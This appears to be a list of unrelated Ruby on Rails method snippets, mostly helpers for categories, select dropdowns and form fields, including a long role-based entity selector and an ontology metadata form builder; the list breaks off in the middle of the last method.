"def category=(cat, *args, &block)\n cat = $game_system.masai_category if $game_system.masai_category.is_a?(Symbol)\n # Run Original Method\n super(cat, *args, &block)\n end",
"def select_field_tag(name, current_value, choices, html_options = {})\r\n #MGS- force the name to be set to the name, no matter the html options\r\n html_options['name'] = name\r\n #MES- Set the ID to the name, if no ID was supplied\r\n if !html_options.has_key?('id')\r\n #MES- Replace '[' with '_' and ']' with '' because square brackets are not\r\n # allowed in IDs.\r\n html_options['id'] = name.sub(/[\\[]/, '_').sub(/\\]/, '')\r\n end\r\n\r\n options = ''\r\n choices.each do | item |\r\n options << option_tag(item[1], item[0], current_value.to_s == item[0].to_s)\r\n end\r\n #MGS- use this rails helper to build the select element\r\n content_tag(\"select\", options, html_options)\r\n end",
"def category_show_data\n category = Category.find(params[:category])\n\n @data = {\n name: category.full_name,\n vendors: vendors_data_from_category(category),\n protips: protips_from_category(category)\n }\n\n render json: @data\n end",
"def collect_tier_categories_for_select(klass, select=true)\n result = klass.find_all_categories.map {|c| [c.name, c.id]}\n result.insert(0, [\"Select...\".t, nil])\n result\n end",
"def set_shop_catagories\n @Catagories = Catagory.all \n end",
"def set_doctor_options(patient_ailment)\n @doctor_options = Hash.new\n specialty = ailment_specialty_pairs[patient_ailment]\n Doctor.where(specialty: specialty).map { |doctor| @doctor_options[doctor.name] = doctor.id }\n end",
"def filter_options(attr_class_option_ids)\n sql = %{\n SELECT DISTINCT CASE WHEN attributable_type=:product THEN\n attributable_id ELSE product_id END AS p_id\n FROM product_attributes pa\n JOIN attribute_options ao ON ao.id=pa.value_id\n LEFT JOIN product_search_products psp\n ON psp.search_product_id=attributable_id\n AND pa.attributable_type=:search_product\n WHERE attributable_type IN (:product, :search_product)\n AND value_type=:attribute_options\n AND ao.attribute_class_option_id IN (:attr_class_option_ids)\n }\n query = sanitize_sql_array [sql,\n {\n product: SitescanCommon::Product,\n search_product: SitescanCommon::SearchProduct,\n attribute_options: SitescanCommon::AttributeOption,\n attr_class_option_ids: attr_class_option_ids\n }]\n connection.select_values query\n end",
"def populate_category\n\t\t\t\tif params[:purpose] == \"category\"\n\t\t\t\t\t\tcategory = Category.find(params[:category_id])\n\t\t\t\t\t\t@sub_categories = category.sub_categories\n\t\t\t\telsif params[:purpose] == \"sub_category\"\n\t\t\t\t\t\tsub_category = SubCategory.find(params[:category_id])\n\t\t\t\t\t\t@inner_categories = sub_category.inner_categories\n\t\t\t\tend\n\t\tend",
"def select_custom_fields\n group_custom_fields 'select'\n end",
"def set_Category(value)\n set_input(\"Category\", value)\n end",
"def set_Category(value)\n set_input(\"Category\", value)\n end",
"def set_Category(value)\n set_input(\"Category\", value)\n end",
"def option_foreign_key_choices(object, foreign_key, foreign_key_choices_array)\n html = []\n foreign_key_choices_array.each do |choice|\n html <<\n \"<option value = #{choice.id} \n #{is_selected_html?(object, foreign_key, choice)}>\n #{choice.name}\n </option>\"\n end\n html.join\n end",
"def build_drop_down_for_klasses\n @drop_down_for_klasses = @klasses.inject([]) do |result,klass|\n result << [klass.name, admin_data_list_url(:klass => klass.name)]\n end\n end",
"def type_select object, method, label_text, options\n content_tag :div, :class => :\"type-select\" do\n attr_id = \"#{object.class.to_s.downcase}[#{method}]\".to_sym\n output = String.new\n output << content_tag(:label, label_text, :for => attr_id) unless label_text.blank?\n output << select_tag(attr_id, options)\n end\n end",
"def build_select(type, select_options_as_html)\n select_options = {\n id: input_id_from_type(type),\n name: input_name_from_type(type)\n }.merge!(@html_options)\n select_options[:disabled] = \"disabled\" if @options[:disabled]\n select_options[:class] = css_class_attribute(type, select_options[:class], @options[:with_css_classes]) if @options[:with_css_classes]\n\n select_html = +\"\\n\"\n select_html << content_tag(\"option\", \"\", value: \"\", label: \" \") + \"\\n\" if @options[:include_blank]\n select_html << prompt_option_tag(type, @options[:prompt]) + \"\\n\" if @options[:prompt]\n select_html << select_options_as_html\n\n (content_tag(\"select\", select_html.html_safe, select_options) + \"\\n\").html_safe\n end",
"def categorize_reports\n \t@reports = Report.all\n \t@reports.each do |report|\n \t\t# Get crime description\n \t\tdescription = report.description\n\n \t\t# Assign crime category based on description\n\t \tcase description\n\t\t\twhen \"118 - Theft - From Motor Vehicle - Petit\"\n\t\t\t\treport.update_attribute(:category, \"Theft From Motor Vehicle\")\n\t\t\twhen \"117 - Theft - From Motor Vehicle - Felony\"\n\t\t\t\treport.update_attribute(:category, \"Theft From Motor Vehicle\")\n\t\t\twhen \"450 - Robbery\"\n\t\t\t\treport.update_attribute(:category, \"Robbery\")\n\t\t\twhen \"254 - Assault\"\n\t\t\t\treport.update_attribute(:category, \"Assault\")\n\t\t\twhen \"262 - Felony Assault\"\n\t\t\t\treport.update_attribute(:category, \"Assault\")\n\t\t\twhen \"200 - Motor Vehicle Theft\"\n\t\t\t\treport.update_attribute(:category, \"Motor Vehicle Theft\")\n\t\t\twhen \"101 - Burglary - Zone 1\"\n\t\t\t\treport.update_attribute(:category, \"Burglary\")\n\t\t\twhen \"102 - Burglary - Zone 2\"\n\t\t\t\treport.update_attribute(:category, \"Burglary\")\n\t\t\twhen \"103 - Burglary - Zone 3\"\n\t\t\t\treport.update_attribute(:category, \"Burglary\")\n\t\t\twhen \"104 - Burglary - Zone 4\"\n\t\t\t\treport.update_attribute(:category, \"Burglary\")\n\t\t\twhen \"105 - Burglary - Zone 5\"\n\t\t\t\treport.update_attribute(:category, \"Burglary\")\n\t\t\twhen \"300 - Rape/Sexual Assault Vic 16 Yr and Older\"\n\t\t\t\treport.update_attribute(:category, \"Rape\")\n\t\t\twhen \"301 - Rape/Sexual Assault Vic 15 Yr and Younger\"\n\t\t\t\treport.update_attribute(:category, \"Rape\")\n\t\t\twhen \"250 - Homicide\"\n\t\t\t\treport.update_attribute(:category, \"Murder\")\n\t\tend\n\n\t\t# Get crime year\n\t\tyear = \"\"\n\t\tif report.date.length == 10\n\t\t\tyear = report.date[6..10]\n\t\tend\n\n\t\t# Update Year column from date\n\t\treport.update_attribute(:year, year)\n\tend\n\n\tredirect_to 'http://localhost:3000/admin'\n\n end",
"def add_choice_link(attribute)\n display = attribute.preset? ? \"\" : \"none\"\n link_to_function(t(\"custom_attributes.add_choice\"), \"addAttributeChoices(this)\", :class => \"add_choice_link right_link\", :style => \"display: #{ display }\")\n end",
"def selectize_items(selector = selectize_selector)\n all(\"#{selector} .selectize-dropdown-content .item\").map do |div|\n {\n value: div[:'data-value'],\n text: div.text,\n }\n end\n end",
"def add_html_options(existing_options)\n { readonly: @readonly, disabled: @disabled, autocomplete: @autocomplete }.merge(@data_options)\n .merge(existing_options)\n end",
"def prepare\n options[:category] = options[:value] if options[:value] && !options[:category]\n raise \"No categorizer set up for category tracker #{self.inspect}\" unless options[:category]\n \n @categorizer = create_lambda(options[:category]) unless options[:multiple]\n \n # Initialize the categories. Use the list of category names to \n @categories = {}\n options[:all_categories].each { |cat| @categories[cat] = 0 } if options[:all_categories].kind_of?(Enumerable)\n end",
"def data\n skill_categories.map do |category|\n edit_path = link_to(fa_icon('edit lg'), edit_skill_category_path(category))\n delete_path = link_to(fa_icon('trash-o lg'), category, method: :delete, data: { confirm: I18n.t('skill_categories.index.delete_confirm') })\n [\n link_to(category.name, skill_category_skills_path(category)),\n \"#{edit_path} #{delete_path}\"\n ]\n end\n end",
"def set_visual_info ()\n classes = ''\n\n ct = self.category_type\n ct && ct !~ /unknown/i &&\n classes << \" type_\" + ct.gsub( /[^a-zA-Z0-9\\-_]+/, '_' )\n\n classes << \" \" + to_css_class(self.category)\n\n self.css_classes = classes\n self.block_label = \"#{self.title}:<br/> #{self.subtitle}\"\n end",
"def set_selectbox_options\n set_kind_option\n set_scheduled_times_option\n set_user_option\n end",
"def initialize(category_options={})\n @id = category_options[\"id\"]\n @name = category_options[\"name\"]\n end",
"def amee_data_category\n @amee_data_category||=AMEE::Data::Category.get(connection, \"/data#{path}\")\n end",
"def parse_subdomain_categories\n dry_run_notification\n\n page_html = get_page_html SUBDOMAINS_LIST_URI\n\n ids = []\n\n if page_html\n page_html.css('#form_search_shop option').drop(1).each do |category|\n display_info \"#{category[:value]} --> #{category.content}\"\n\n ids << {id: category[:value], name: category.content}\n end\n end\n\n ids\n end",
"def load_edit_data\n super_load_data\n\n @grouped_option_values ||= @product.option_values.group_by(&:option_type)\n @grouped_option_values.sort_by { |option_type, option_values| option_type.position }\n end",
"def setup_hidden_option(good, good_id)\n return unless shop_options[:hidden][good_id]\n good.hidden_condition = shop_options[:hidden][good_id]\n end",
"def form_tr_select_cat_from_tree(form, obj, root, name, col, id, display_name, selected_obj, *args)\n options = args.extract_options!\n out = ''\n out += '<tr><td class=\"label\">'\n out += form.label col.to_sym, name\n out += ' : </td>'\n out += '<td class=\"field\">'\n out += select_cat_from_tree(obj, col, root, selected_obj, options)\n out += '</td></tr>'\n return out\n end",
"def amount_select\n tag = \"<select id=\\\"voucher_#{@voucher.id}_amount\\\">\"\n for i in (1..20)\n tag += \"<option value=\\\"#{i}\\\">#{i}</option>\"\n end\n tag += \"</select>\"\n end",
"def parse_option\n case params[:option]\n when \"id\", \"single_id\"\n # Render the id select field.\n \"shared/id_select\"\n when \"id_list\", \"id_array\"\n # Render the id multi select field.\n \"shared/id_multi_select\"\n when \"conditions_array\", \"conditions_hash\"\n # Render the conditions fields.\n @partial = \"shared/conditions\"\n when \"sub_method\", \"amount\", \"dynamic_find_by\", \"batches\", \"attributes\"\n # Render the corresponding option field(s).\n params[:option]\n end\n end",
"def select_field_user_security_att(user, group_id, choices, options = {})\r\n return select_field_tag(\"security_atts[#{group_id}]\", user.get_att_value(UserAttribute::ATT_SECURITY, group_id), choices, options.update({:id => \"security_atts_#{group_id}\"}))\r\n end",
"def options_html(type, is_person, super_entity, cid=\"00\", return_type=\"html\")\n sel_flag = true\n sel_str = \"\"\n\n poa_str = \" (Principal Entity) \"\n poa_str = \" (Principal Individual) \" if is_person == \"true\"\n\n array_result = []\n select_one_html = \"<option value=''>Select One...</option>\"\n result = \"\"\n\n if is_person == \"true\"\n groups = {}\n\n case type\n when \"stockholder\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2, 3, 4]).order(type_: :asc)\n when \"principal\"\n person_true_entities = current_user.entities_list(super_entity).where(type_: [1, 2, 4]).order(type_: :asc)\n when \"agent\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2]).where('id != ?', super_entity.principal.entity_id).order(type_: :asc)\n when \"settlor\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2, 3, 4]).order(type_: :asc)\n when \"trustee\"\n if super_entity.beneficiaries.select(:entity_id).map(&:entity_id).blank?\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 3, 4]).order(type_: :asc)\n else\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 3, 4]).where('id not in (?)', super_entity.beneficiaries.select(:entity_id).map(&:entity_id)).order(type_: :asc)\n end\n when \"beneficiary\"\n if super_entity.trustees.select(:entity_id).map(&:entity_id).blank?\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2, 3, 4]).order(type_: :asc)\n else\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2, 3, 4]).where('id not in (?)', super_entity.trustees.select(:entity_id).map(&:entity_id)).order(type_: :asc)\n end\n when \"member\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2, 3, 4]).order(type_: :asc)\n when \"manager\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2, 3, 4]).order(type_: :asc)\n when \"general-partner\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2, 3, 4]).order(type_: :asc)\n when \"limited-partner\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2, 3, 4]).order(type_: :asc)\n when \"partner\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 3, 4]).order(type_: :asc)\n when \"limited-liability-partner\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 3, 4]).order(type_: :asc)\n when \"director\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 3]).order(type_: :asc)\n when \"officer\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 3]).order(type_: :asc)\n when \"tenant-in-common\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2, 3, 4]).order(type_: :asc)\n when \"spouse\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 3, 4]).order(type_: :asc)\n when \"joint-tenant\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2, 3, 4]).order(type_: :asc)\n when \"guardian\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1]).order(type_: :asc)\n when \"ward\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1]).order(type_: :asc)\n else\n 
person_true_entities = []\n end\n\n person_true_entities.each do |entity|\n key = \"#{MemberType.member_types[entity.type_]}\"\n key = key + poa_str if !key.match(\"ttorney\").nil?\n if groups[key].nil?\n groups[key] = [entity]\n else\n groups[key] << entity\n end\n end\n\n case type\n when \"stockholder\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Corporate Stockholder', user_id: current_user.id)\n when \"principal\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Principal', user_id: current_user.id)\n when \"agent\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Agent', user_id: current_user.id)\n when \"settlor\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Settlor', user_id: current_user.id)\n when \"trustee\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Trustee', user_id: current_user.id)\n when \"beneficiary\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Beneficiary', user_id: current_user.id)\n when \"member\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'LLC Member', user_id: current_user.id)\n when \"manager\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'LLC Outside Manager', user_id: current_user.id)\n when \"general-partner\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'LP General Partner', user_id: current_user.id)\n when \"limited-partner\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'LP Limited Partner', user_id: current_user.id)\n when \"partner\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Partner', user_id: current_user.id)\n when \"limited-liability-partner\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Limited Liability Partner', user_id: current_user.id)\n when \"director\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Corporate Director', user_id: current_user.id)\n when \"officer\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Corporate Officer', user_id: current_user.id)\n when \"tenant-in-common\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Tenant in Common', user_id: current_user.id)\n when \"spouse\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Tenant by Entirety', user_id: current_user.id)\n when \"joint-tenant\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Joint Tenant', user_id: current_user.id)\n when \"judge\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Judge', user_id: current_user.id)\n when \"guardian\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Guardian', user_id: current_user.id)\n when \"ward\"\n person_true_contacts = 
Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Ward', user_id: current_user.id)\n else\n person_true_contacts = []\n end\n\n groups.each do |k,v|\n result += \"<optgroup label='#{k}'>\"\n v.each do |entity|\n if (sel_flag && \"e#{entity.id}\" == cid) || (person_true_entities.count + person_true_contacts.count == 1)\n sel_flag = false\n sel_str = \" selected='selected' \"\n else\n sel_str = \"\"\n end\n result += \"<option value='e#{entity.id}' data-type='entity' #{sel_str}>#{entity.name} </option>\"\n array_result << [entity.id, entity.name]\n end\n result += \"</optgroup>\"\n end\n\n result += \"<optgroup label='Contacts'>\"\n\n person_true_contacts.each do |contact|\n if (sel_flag && \"c#{contact.id}\" == cid) || (person_true_entities.count + person_true_contacts.count == 1)\n sel_flag = false\n sel_str = \" selected='selected' \"\n else\n sel_str = \"\"\n end\n result += \"<option value='c#{contact.id}' data-type='contact' #{sel_str}>#{contact.name}</option>\"\n array_result << [contact.id, contact.name]\n end\n\n result += \"</optgroup>\"\n if return_type == 'html'\n if array_result.length > 1\n return (select_one_html + result).html_safe\n else\n return result.html_safe\n end\n else\n return array_result\n end\n\n else\n groups = {}\n\n case type\n when \"stockholder\"\n person_false_entities = current_user.entities_list(super_entity.id).where(type_: [6, 10, 11, 12, 13, 14]).order(type_: :asc)\n when \"principal\"\n person_false_entities = current_user.entities_list(super_entity).where(type_: [6, 10, 11, 12, 13, 14]).order(type_: :asc)\n when \"agent\"\n person_false_entities = current_user.entities_list(super_entity.id).where(type_: [10, 11, 12, 13, 14]).where('id != ?', super_entity.principal.entity_id).order(type_: :asc)\n when \"trustee\"\n person_false_entities = current_user.entities_list(super_entity.id).where(type_: [10, 11, 12, 13, 14]).order(type_: :asc)\n when \"beneficiary\"\n person_false_entities = current_user.entities_list(super_entity.id).where(type_: [6]).order(type_: :asc)\n when \"member\"\n person_false_entities = current_user.entities_list(super_entity.id).where(type_: [6, 10, 11, 12, 13, 14]).order(type_: :asc)\n when \"manager\"\n person_false_entities = current_user.entities_list(super_entity.id).where(type_: [10, 11, 12, 13, 14]).order(type_: :asc)\n when \"general-partner\"\n person_false_entities = current_user.entities_list(super_entity.id).where(type_: [10, 11, 12, 13, 14]).order(type_: :asc)\n when \"limited-partner\"\n person_false_entities = current_user.entities_list(super_entity.id).where(type_: [10, 11, 12, 13, 14]).order(type_: :asc)\n when \"tenant-in-common\"\n person_false_entities = current_user.entities_list(super_entity.id).where(type_: [6, 10, 11, 12, 13, 14]).order(type_: :asc)\n when \"guardian\"\n person_false_entities = current_user.entities_list(super_entity.id).where(type_: [14]).order(type_: :asc)\n else\n person_false_entities = []\n end\n\n person_false_entities.each do |entity|\n key = \"#{MemberType.member_types[entity.type_]}\"\n key = key + poa_str if !key.match(\"ttorney\").nil?\n if groups[key].nil?\n groups[key] = [entity]\n else\n groups[key] << entity\n end\n end\n\n case type\n when \"stockholder\"\n person_false_contacts = Contact.all.where(is_company: true, contact_type: 'Client Participant', role: 'Corporate Stockholder', user_id: current_user.id)\n when \"principal\"\n person_false_contacts = Contact.all.where(is_company: true, contact_type: 'Client Participant', role: 'Principal', 
user_id: current_user.id)\n when \"agent\"\n person_false_contacts = Contact.all.where(is_company: true, contact_type: 'Client Participant', role: 'Agent', user_id: current_user.id)\n when \"trustee\"\n person_false_contacts = Contact.all.where(is_company: true, contact_type: 'Client Participant', role: 'Trustee', user_id: current_user.id)\n when \"member\"\n person_false_contacts = Contact.all.where(is_company: true, contact_type: 'Client Participant', role: 'LLC Member', user_id: current_user.id)\n when \"manager\"\n person_false_contacts = Contact.all.where(is_company: true, contact_type: 'Client Participant', role: 'LLC Outside Manager', user_id: current_user.id)\n when \"general-partner\"\n person_false_contacts = Contact.all.where(is_company: true, contact_type: 'Client Participant', role: 'LP General Partner', user_id: current_user.id)\n when \"limited-partner\"\n person_false_contacts = Contact.all.where(is_company: true, contact_type: 'Client Participant', role: 'LP Limited Partner', user_id: current_user.id)\n when \"tenant-in-common\"\n person_false_contacts = Contact.all.where(is_company: true, contact_type: 'Client Participant', role: 'Tenant in Common', user_id: current_user.id)\n when \"judge\"\n person_false_contacts = Contact.all.where(is_company: true, contact_type: 'Client Participant', role: 'Judge', user_id: current_user.id)\n else\n person_false_contacts = []\n end\n\n groups.each do |k,v|\n result += \"<optgroup label='#{k}'>\"\n v.each do |entity|\n if (sel_flag && \"e#{entity.id}\" == cid) || (person_false_entities.count + person_false_contacts.count == 1)\n sel_flag = false\n sel_str = \" selected='selected' \"\n else\n sel_str = \"\"\n end\n result += \"<option value='e#{entity.id}' data-type='entity' #{sel_str}>#{entity.name} </option>\"\n array_result << [entity.id, entity.name]\n end\n result += \"</optgroup>\"\n end\n\n result += \"</optgroup><optgroup label='Contacts '>\"\n\n person_false_contacts.each do |contact|\n if (sel_flag && \"c#{contact.id}\" == cid) || (person_false_entities.count + person_false_contacts.count == 1)\n sel_flag = false\n sel_str = \" selected='selected' \"\n else\n sel_str = \"\"\n end\n result += \"<option value='c#{contact.id}' data-type='contact' #{sel_str}>#{contact.name}</option>\"\n array_result << [contact.id, contact.name]\n end\n\n result += \"</optgroup>\"\n if return_type == 'html'\n if array_result.length > 1\n return (select_one_html + result).html_safe\n else\n return result.html_safe\n end\n else\n return array_result\n end\n\n end\n end",
"def select_category_from_dropdown(category)\n click('Click to select category from dropdown', @driver.find_element(:xpath, DROPDOWN_OPTIONS_FORMAT % [category]))\n end",
"def categories_attributes=(category_attributes)\n category_attributes.values.each do |category_attribute|\n if !category_attribute[:name].empty?\n category = Category.find_or_create_by(category_attribute)\n self.categories << category\n end\n end \n \n end",
"def category_check_box_tags(field, options={})\n Preference.notification_options.map do |value|\n check_box_tag(\"preference[categories][#{field}][]\", value,\n @preference.categories[field] && @preference.categories[field].include?(value),\n options\n )\n end.join('</td><td class=\\'check-boxes\\'>').html_safe\n end",
"def get_listbox_data\n @countries = current_user.company.countries.dropdown_list\n @sectors = current_user.company.sectors.order(:sector)\n @rel_types = current_user.company.rel_types.dropdown_list\n @relationgroups = current_user.company.relations.dropdown_list\n end",
"def category_selection(category)\n category = Public_apis.find_by_name(category)\n #goes over list item array . find method to find item\n\n \n end",
"def populate_collection_select_fields\n create :state, state_name: 'California', code: 'CA'\n create :site_type, description: 'City', code: 'city', status: 'active', hide: 'no'\n end",
"def generate_attribute_input(attr_label)\r\n input_html = ''.html_safe\r\n\r\n # Get the attribute hash corresponding to the given attribute\r\n attr = @metadata.select{ |attr_hash| attr_hash[\"attribute\"].to_s.eql?(attr_label) }.first\r\n\r\n if attr[\"enforce\"].include?(\"integer\")\r\n number_field :submission, attr[\"attribute\"].to_s.to_sym, value: @submission.send(attr[\"attribute\"])\r\n\r\n elsif attr[\"enforce\"].include?(\"date_time\")\r\n if @submission.send(attr[\"attribute\"]).nil?\r\n date_value = nil\r\n else\r\n date_value = DateTime.parse(@submission.send(attr[\"attribute\"])).to_date.to_s\r\n end\r\n text_field(:submission, attr[\"attribute\"].to_s.to_sym, :class => \"datepicker\", value: \"#{date_value}\")\r\n\r\n elsif attr[\"enforce\"].include?(\"textarea\")\r\n text_area(:submission, attr[\"attribute\"].to_s.to_sym, rows: 3, value: @submission.send(attr[\"attribute\"]))\r\n\r\n # Create select dropdown when there are enforcedValues for the attr. But also let the user enter its own value if Other selected\r\n elsif !attr[\"enforcedValues\"].nil?\r\n metadata_values = @submission.send(attr[\"attribute\"])\r\n select_values = attr[\"enforcedValues\"].collect{ |k, v| [v,k]}\r\n # Add in the select ontologies that are not in the portal but are in the values\r\n if metadata_values.kind_of?(Array)\r\n metadata_values.map do |metadata|\r\n if !select_values.flatten.include?(metadata)\r\n select_values << metadata\r\n end\r\n end\r\n else\r\n if (!select_values.flatten.include?(metadata_values) && !metadata_values.to_s.empty?)\r\n select_values << metadata_values\r\n end\r\n end\r\n\r\n if attr[\"enforce\"].include?(\"list\")\r\n input_html << select_tag(\"submission[#{attr_label}][]\", options_for_select(select_values, metadata_values), :multiple => 'true',\r\n \"data-placeholder\".to_sym => \"Select ontologies\", :style => \"margin-bottom: 15px; width: 100%;\", :id => \"select_#{attr[\"attribute\"]}\", :class => \"selectOntology\")\r\n\r\n input_html << text_field_tag(\"add_#{attr[\"attribute\"].to_s}\", nil, :style => \"margin-left: 1em; margin-right: 1em;width: 16em;\", :placeholder => \"Or provide the value\",\r\n :onkeydown => \"if (event.keyCode == 13) { addOntoToSelect('#{attr[\"attribute\"]}'); return false;}\")\r\n\r\n input_html << button_tag(\"Add new value\", :id => \"btnAdd#{attr[\"attribute\"]}\", :style => \"margin-bottom: 2em;vertical-align: baseline;\",\r\n :type => \"button\", :class => \"btn btn-info btn-sm\", :onclick => \"addOntoToSelect('#{attr[\"attribute\"]}')\")\r\n\r\n else\r\n\r\n select_values << [\"None\", \"\"]\r\n select_values << [\"Other\", \"other\"]\r\n\r\n if metadata_values.nil?\r\n metadata_values = \"\"\r\n end\r\n\r\n input_html << select(\"submission\", attr[\"attribute\"], select_values, { :selected => metadata_values}, {:class => \"form-control\", :id => \"select_#{attr[\"attribute\"]}\", :style=> \"margin-bottom: 1em;\"})\r\n\r\n # Button and field to add new value (that are not in the select). 
Show when other is selected\r\n input_html << text_field_tag(\"add_#{attr[\"attribute\"].to_s}\", nil, :style => \"margin-left: 1em; margin-right: 1em;width: 16em;display: none;\", :placeholder => \"Or provide the value\",\r\n :onkeydown => \"if (event.keyCode == 13) { addValueToSelect('#{attr[\"attribute\"]}'); return false;}\")\r\n\r\n input_html << button_tag(\"Add new value\", :id => \"btnAdd#{attr[\"attribute\"]}\", :style => \"margin-bottom: 2em;display: none;vertical-align: baseline;\",\r\n :type => \"button\", :class => \"btn btn-info btn-sm\", :onclick => \"addValueToSelect('#{attr[\"attribute\"]}')\")\r\n\r\n # To show/hide textbox when other option is selected or not\r\n input_html << javascript_tag(\"$(function() {\r\n $('#select_#{attr[\"attribute\"]}').change(function() {\r\n if ($('#select_#{attr[\"attribute\"]}').val() == 'other') {\r\n $('#add_#{attr[\"attribute\"].to_s}').val(\"\");\r\n $('#btnAdd#{attr[\"attribute\"]}').show();\r\n $('#add_#{attr[\"attribute\"].to_s}').show();\r\n } else {\r\n $('#btnAdd#{attr[\"attribute\"]}').hide();\r\n $('#add_#{attr[\"attribute\"].to_s}').hide();\r\n }\r\n });\r\n })\")\r\n\r\n end\r\n\r\n\r\n return input_html\r\n\r\n\r\n elsif attr[\"enforce\"].include?(\"isOntology\")\r\n metadata_values = @submission.send(attr[\"attribute\"])\r\n select_values = @ontologies_for_select.dup\r\n # Add in the select ontologies that are not in the portal but are in the values\r\n if metadata_values.kind_of?(Array)\r\n metadata_values.map do |metadata|\r\n if !select_values.flatten.include?(metadata)\r\n select_values << metadata\r\n end\r\n end\r\n else\r\n\r\n if !select_values.flatten.include?(metadata_values)\r\n select_values << metadata_values\r\n end\r\n end\r\n\r\n if attr[\"enforce\"].include?(\"list\")\r\n input_html << select_tag(\"submission[#{attr_label}][]\", options_for_select(select_values, metadata_values), :multiple => 'true',\r\n \"data-placeholder\".to_sym => \"Select ontologies\", :style => \"margin-bottom: 15px; width: 100%;\", :id => \"select_#{attr[\"attribute\"]}\", :class => \"selectOntology\")\r\n\r\n else\r\n input_html << select_tag(\"submission[#{attr_label}]\", options_for_select(select_values, metadata_values), \"data-placeholder\".to_sym => \"Select ontology\",\r\n :style => \"margin-bottom: 15px; width: 100%;\", :id => \"select_#{attr[\"attribute\"]}\", :class => \"selectOntology\", :include_blank => true)\r\n end\r\n # Button and field to add new value (not in the select)\r\n input_html << tag(:br)\r\n\r\n input_html << text_field_tag(\"add_#{attr[\"attribute\"]}\", nil, :style => \"margin-left: 1em; margin-right: 1em;vertical-align: super;width: 16em;\",\r\n :placeholder => \"Ontology outside of the Portal\", :onkeydown => \"if (event.keyCode == 13) { addOntoToSelect('#{attr[\"attribute\"]}'); return false;}\")\r\n\r\n input_html << button_tag(\"Add new ontology\", :id => \"btnAdd#{attr[\"attribute\"]}\", :style => \"margin-bottom: 2em;margin-top: 1em;\",\r\n :type => \"button\", :class => \"btn btn-info btn-sm\", :onclick => \"addOntoToSelect('#{attr[\"attribute\"]}')\")\r\n\r\n return input_html\r\n\r\n elsif attr[\"enforce\"].include?(\"uri\")\r\n if @submission.send(attr[\"attribute\"]).nil?\r\n uri_value = \"\"\r\n else\r\n uri_value = @submission.send(attr[\"attribute\"])\r\n end\r\n\r\n if attr[\"enforce\"].include?(\"list\")\r\n input_html << button_tag(\"Add new value\", :id => \"add#{attr[\"attribute\"]}\", :style => \"margin-bottom: 0.5em;margin-top: 0.5em;margin-left: 0.5em;\",\r\n :type => \"button\", 
:class => \"btn btn-info btn-sm\", :onclick => \"addInput('#{attr[\"attribute\"]}', 'url')\")\r\n input_html << url_field_tag(\"submission[#{attr[\"attribute\"].to_s}][]\", uri_value[0], :id => attr[\"attribute\"].to_s, class: \"metadataInput\")\r\n # Add field if list of URI\r\n if !@submission.send(attr[\"attribute\"]).nil? && @submission.send(attr[\"attribute\"]).any?\r\n @submission.send(attr[\"attribute\"]).each_with_index do |metadata_val, index|\r\n if index != 0\r\n input_html << url_field_tag(\"submission[#{attr[\"attribute\"].to_s}][]\", metadata_val, :id => \"submission_#{attr[\"attribute\"].to_s}\", class: \"metadataInput\")\r\n end\r\n end\r\n end\r\n input_html << content_tag(:div, \"\", id: \"#{attr[\"attribute\"]}Div\")\r\n\r\n else\r\n # if single value\r\n input_html << text_field(:submission, attr[\"attribute\"].to_s.to_sym, value: uri_value, class: \"metadataInput\")\r\n end\r\n return input_html\r\n\r\n elsif attr[\"enforce\"].include?(\"boolean\")\r\n select(\"submission\", attr[\"attribute\"].to_s, [\"none\", \"true\", \"false\"], { :selected => @submission.send(attr[\"attribute\"])},\r\n {:class => \"form-control\", :style => \"margin-top: 0.5em; margin-bottom: 0.5em;\"})\r\n\r\n else\r\n # If input a simple text\r\n\r\n if attr[\"enforce\"].include?(\"list\")\r\n input_html << button_tag(\"Add new value\", :id => \"add#{attr[\"attribute\"]}\", :style => 